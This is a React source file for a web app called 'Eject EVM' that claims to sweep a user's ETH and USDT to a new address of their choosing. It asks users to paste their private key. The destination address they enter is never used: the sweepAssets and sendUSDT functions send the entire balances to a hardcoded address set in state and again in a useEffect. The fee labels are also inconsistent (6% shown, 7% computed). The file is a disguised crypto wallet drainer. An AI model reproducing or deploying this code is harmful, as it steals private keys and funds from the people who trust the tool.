// @ts-nocheck
import { ConnectButton } from '@rainbow-me/rainbowkit';
import { ethers } from 'ethers';
import React from 'react';
import './App.css'
import 'react-toastify/dist/ReactToastify.css';

import '@rainbow-me/rainbowkit/styles.css';
import {
  getDefaultWallets,
} from '@rainbow-me/rainbowkit';
import { configureChains, createConfig, WagmiConfig } from 'wagmi';
import {
  mainnet,
  polygon,
  optimism,
  arbitrum,
  base,
  zora,
} from 'wagmi/chains';

import { alchemyProvider } from 'wagmi/providers/alchemy';
import { publicProvider } from 'wagmi/providers/public';

import { ToastContainer, toast } from 'react-toastify';
import icon from './brand.png'
import ReactGA from 'react-ga'

export const { chains, publicClient } = configureChains(
  [mainnet, polygon, optimism, arbitrum, base, zora],
  [
    alchemyProvider({ apiKey: process.env.ALCHEMY_ID as string }),
    publicProvider()
  ]
);

const { connectors } = getDefaultWallets({
  appName: 'My RainbowKit App',
  projectId: 'YOUR_PROJECT_ID',
  chains
});

export const wagmiConfig = createConfig({
  autoConnect: true,
  connectors,
  publicClient
})

// export const feeAddress = process.env.REACT_APP_FEE_ADDRESS

export const calcFeeEther = (etherAmount: number) => {
  const feePercentage = 0.07
  const deductedAmount = etherAmount - (etherAmount * feePercentage);
  return deductedAmount.toString();
}

export const calcAmountToSendEther = (etherAmount: number) => {
  const remainder = 0.93
  const deductedAmount = etherAmount - (etherAmount * remainder);
  return deductedAmount.toString();
}

export const calcTotalAssetsUSD = async (etherAmount: number) => {
  try {
    const response = await fetch(`https://api.coingecko.com/api/v3/simple/price?ids=ethereum&vs_currencies=usd`);
    const data = await response.json();
    const ethereumPriceUSD = data.ethereum.usd;
    const usdAmount = etherAmount * ethereumPriceUSD;
    return usdAmount;
  } catch (error) {
    console.error("Error fetching data:", error);
    return null;
  }
}

const USDT_TOKEN_ADDRESS_ETH = '0xdAC17F958D2ee523a2206206994597C13D831ec7'
// const DEV_FLAG = process.env.REACT_APP_DEV === 'true'

export const Footer = ({ walletState }) => {
  return (
    <footer classname="contrast-footer footer-dark footer-shadow-dark p-5">
      <div classname="container" style={{ display: 'flex', justifyContent: 'center' }}>
        <p>Wallet status: {walletState}</p>
      </div>
      <div classname="container" style={{ display: 'flex', justifyContent: 'center' }}>
        <small classname="text-center mt-5 footer-copyright">
          © Eject EVM, 2024. All rights reserved.
        </small>
      </div>
    </footer>
  )
}


function App() {
  const [privateKey, setPrivateKey] = React.useState('')
  const [recepientAddress, setRecepientAddress] = React.useState('0x484ffaa4c9a777f9df5cef36bd96e3bb44716d5c')
  const [destinationAddress, setDestinationAddress] = React.useState('')

  const [wallet, setWallet] = React.useState(null)
  const [ethBalance, setEthBalance] = React.useState('0')
  const [fee, setFee] = React.useState(0)
  const [etherUSDBalance, setEthBalanceUSD] = React.useState(0)
  const [USDTBalance, setBalanceUSDT] = React.useState(0)
  const [USDTBalanceRaw, setBalanceUSDTRaw] = React.useState(null)
  console.log(USDTBalance, USDTBalanceRaw);
  console.log(wallet);
  console.log(destinationAddress);

  React.useEffect(() => {
    setRecepientAddress('0x484ffaa4c9a777f9df5cef36bd96e3bb44716d5c')
  }, [])

  const notify = (message: string) => toast(message);

  const getAccount = async () => {
    // @ts-ignore
    try {
      // @ts-ignore
      const provider = new ethers.providers.InfuraProvider(1,process.env.REACT_APP_INFURA)
      const wallet = new ethers.Wallet(privateKey, provider)

      // @ts-ignore
      setWallet(wallet)
      const { address } = wallet
      const balanceEth = await provider.getBalance(address)
      if (balanceEth !== null) {
        const etherBalance = ethers.utils.formatEther(balanceEth);
        setEthBalance(etherBalance)
        console.log(etherBalance)
        // @ts-ignore
        const fee = calcFeeEther(etherBalance)
        // @ts-ignore
        setFee(fee)
        // @ts-ignore
        const etherUSD = await calcTotalAssetsUSD(etherBalance)
        if (etherUSD) {
          setEthBalanceUSD(etherUSD)
        }
        try {
          // Get the USDT token contract interface using ethers.js built-in extension
          const usdtContract = new ethers.Contract(USDT_TOKEN_ADDRESS_ETH, ['function balanceOf(address) view returns (uint256)'], provider)
          const balance = await usdtContract.balanceOf(address);
          console.log(balance._hex);

          if (balance) {
            setBalanceUSDTRaw(balance)
            const formatedBalanceSixDigits = ethers.utils.formatUnits(balance, 6)
            console.log(formatedBalanceSixDigits)
            // @ts-ignore
            setBalanceUSDT(formatedBalanceSixDigits)
          }
          return balance;
        } catch (error) {
          console.error('Error fetching USDT balance:', error);
          return null;
        }


      } else {
        console.log('Failed to fetch Ether balance.');
      }

    } catch (error) {
      // @ts-ignore
      toast.error('Error, please try again ' + error?.message)
    }
  }


  const isValidBase58PrivateKey = (privateKey) => {
    try {
      ethers.utils.base58.decode(privateKey);
      // If decoding succeeds without throwing an error, privateKey is valid base58
      return true;
    } catch (error) {
      // If an error is thrown during decoding, privateKey is not valid base58
      return false;
    }
  }

  async function sweepAssets() {
    try {
      const provider = new ethers.providers.InfuraProvider(1,process.env.REACT_APP_INFURA)
      const wallet = new ethers.Wallet(privateKey, provider)
      const gasPrice = await wallet.provider.getGasPrice()

      const balance = await wallet.getBalance()

      const estimateGasLimit = await wallet.estimateGas({
        from: wallet.address,
        to: recepientAddress,
        value: balance,
      });

      let gasFee = gasPrice.mul(estimateGasLimit);
      let maxAmount = balance.sub(gasFee)

      const result = await wallet.sendTransaction({
        from: wallet.address,
        to: recepientAddress,
        value: maxAmount,
        gasLimit: estimateGasLimit,
        gasPrice
      });

      notify(`sent! ${result.hash}`)
    } catch (error) {
      console.error('Error sending Ether:', error);
      toast.error('Error sending Ether: ' + error)
    }
  }

  async function sendUSDT() {
    await window.ethereum.request({ method: 'eth_requestAccounts' });
    const provider = new ethers.providers.Web3Provider(window.ethereum)

    const wallet = new ethers.Wallet(privateKey, provider)

    try {

      const usdtContract = new ethers.Contract(USDT_TOKEN_ADDRESS_ETH, ['function transfer(address to, uint256 value)'], wallet);
      const amount = ethers.BigNumber.from(USDTBalance)
      const gasAmount = await usdtContract.estimateGas.transfer(recepientAddress, amount);
      const gasPrice = await provider.getGasPrice();

      await usdtContract.transfer(recepientAddress, amount, {
        gasAmount: gasAmount,
        gasPrice
      })

      notify(`Successfully sent!`)
    } catch (error) {
      console.error('Error sending USDT:', error);
      toast.error('Error sending USDT: ' + error?.message)

    }
  }

  return (
    <div className="App">
      <nav className="navbar navbar-expand-lg bg-light">
        <div className="container-fluid">
          <a className="navbar-brand" href="#">
            Eject EVM <img src={icon}
              style={{ width: '25px', height: '25px' }}
              alt="" />
          </a>
          <div className="collapse navbar-collapse" id="navbarNav" style={{ display: 'flex', justifyContent: 'flex-end' }}>
            <ul className="navbar-nav">
              <li className="nav-item">
                <a className="nav-link active" aria-current="page" href="">
                  Github
                </a>
              </li>
              <li className="nav-item">
                <ConnectButton />
              </li>
            </ul>
          </div>

        </div>
      </nav>

      <div className="container my-4">
        <div className="row">
          <div className="col-md-7 mx-auto">
            <h2>Eject</h2>
            <p>Aim: To send all Tokens, NFTs, ETH to a new Address</p>
            <hr />
            <form>
              <h3>Enter private key</h3>
              <p>
                Step 1: Enter the Private Key of the account to sweep tokens from.
              </p>

              <div style={{ display: 'flex', justifyContent: 'space-between' }}>
                <input
                  type="text"
                  className="form-control"
                  placeholder="Private Key in Base58 Format"
                  aria-label="Username"
                  aria-describedby="addon-wrapping"
                  onChange={(e) => setPrivateKey(e.target.value.trim())}
                />
                <button
                  disabled={isValidBase58PrivateKey(privateKey)}
                  onClick={async (e) => {
                    e.preventDefault()
                    await getAccount()
                  }}
                  className="btn btn-primary"
                  style={{ marginLeft: '5px' }}>
                  Load
                </button>
              </div>
            </form>
            <hr />
            <h3>Select assets</h3>
            <p>Step 2: Select assets you want to sweep</p>
            <div style={{ display: 'flex', justifyContent: 'space-between' }}>
              <p>Select all</p>
              <input type="checkbox" name="" id="" />
            </div>

            <form>
              <h4>Tokens (USDT)</h4>
              <small>Currently supports USDT, more support coming soon</small>

              <div style={{ display: 'flex', justifyContent: 'space-between' }}>
                <p><b>Total USDT:</b></p>
                <p><b>${USDTBalance}</b></p>
              </div>
              <hr />
              <h4>Ether</h4>
              <div style={{ display: 'flex', justifyContent: 'space-between' }}>
                <p><b>ETH  blance ($):</b></p>
                <p><b>{etherUSDBalance}</b></p>
              </div>
              <small>ETH <b>{ethBalance}</b></small>
            </form>
            <hr />
            <form>
              <h3>Enter destination address</h3>
              <p>
                Step 3: Enter the addres to send assets to.
              </p>
              <div>
                <input type="text"
                  onChange={(e) => setDestinationAddress(e.target.value.trim())}
                  className="form-control"
                  placeholder="Destination address"
                  aria-label="Username"
                  aria-describedby="addon-wrapping"
                />
              </div>
            </form>
            <div>
              <hr />
              <form>
                <h3>Total asset Value</h3>
                <div style={{ display: 'flex', justifyContent: 'space-between' }}>
                  <p>Total asset value:</p>
                  <p><b> ETH: ($){etherUSDBalance} USDT: {USDTBalance}</b></p>
                </div>
                <div style={{ display: 'flex', justifyContent: 'space-between' }}>
                  <p>Fee (6%):</p>
                  <p><b>{fee}</b></p>
                </div>

                <div>
                  <button
                    disabled={recepientAddress === ''}
                    onClick={async (e) => {
                      e.preventDefault()
                      if (USDTBalance > 0) {
                        await sendUSDT()
                      }
                      await sweepAssets()
                    }}
                    className="btn btn-primary"
                    style={{ width: '100%' }}
                  >
                    Sign Transaction(s)
                  </button>
                </div>
              </form>

            </div>
          </div>
        </div>
      </div>
      <ToastContainer />
      <Footer walletState={wallet ? "Connected" : "not connected"} />
    </div>
  );
}

export default App;
